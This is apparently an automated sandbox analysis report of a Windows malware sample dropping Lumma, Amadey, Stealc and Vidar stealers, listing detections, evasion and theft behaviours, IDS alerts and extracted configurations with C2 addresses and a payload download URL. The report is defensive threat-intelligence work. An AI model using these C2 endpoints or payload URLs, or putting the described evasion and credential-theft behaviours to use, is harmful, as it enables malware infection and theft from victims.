Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1542670
MD5:	8d1e04c056caf2cc26a48a16be0198b8
SHA1:	f87723b046ab9db7acaa622516e3ba843650dce8
SHA256:	6b2b0c1fcb05eb6811e26b07df264a6a2becb83a95da2a875860c83e55776ff9
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

PE file has a writeable .text section

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe	Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000007.00000003.2308287602.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 26.2.b0b9f39429.exe.ba0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: 26.2.b0b9f39429.exe.ba0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: e192e43b61.exe.1340.11.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["crisiwarny.store", "scriptyprefej.store", "navygenerayk.store", "necklacedmny.store", "presticitpo.store", "thumbystriw.store", "fadehairucw.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for domain / URL

Source: http://185.215.113.16/off/def.exe

Virustotal: Detection: 19%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: file.exe	Virustotal: Detection: 42%			Perma Link
Source: file.exe	ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C66A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	6_2_6C66A9A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C664440 PK11_PrivDecrypt,	6_2_6C664440
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C634420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	6_2_6C634420
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6644C0 PK11_PubEncrypt,	6_2_6C6644C0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6B25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	6_2_6C6B25B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C648670 PK11_ExportEncryptedPrivKeyInfo,	6_2_6C648670
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C66A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	6_2_6C66A650
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C64E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	6_2_6C64E6E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C68A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	6_2_6C68A730
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C690180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	6_2_6C690180
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6643B0 PK11_PubEncryptPKCS1,PR_SetError,	6_2_6C6643B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C687C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	6_2_6C687C00
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C647D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	6_2_6C647D60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C68BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	6_2_6C68BD30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C689EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	6_2_6C689EC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C663FF0 PK11_PrivDecryptPKCS1,	6_2_6C663FF0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C669840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	6_2_6C669840
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C663850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	6_2_6C663850

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50062 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: nss3.pdb@ source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: nss3.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447177544.0000000000192000.00000040.00000001.01000000.0000000B.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000003.2314064013.0000000004E40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe

Directory queried: number of queries: 2130

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 93MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49781 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49797
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49915 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50003 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50002 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50038 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50049 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50050 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49736 -> 104.21.95.91:443
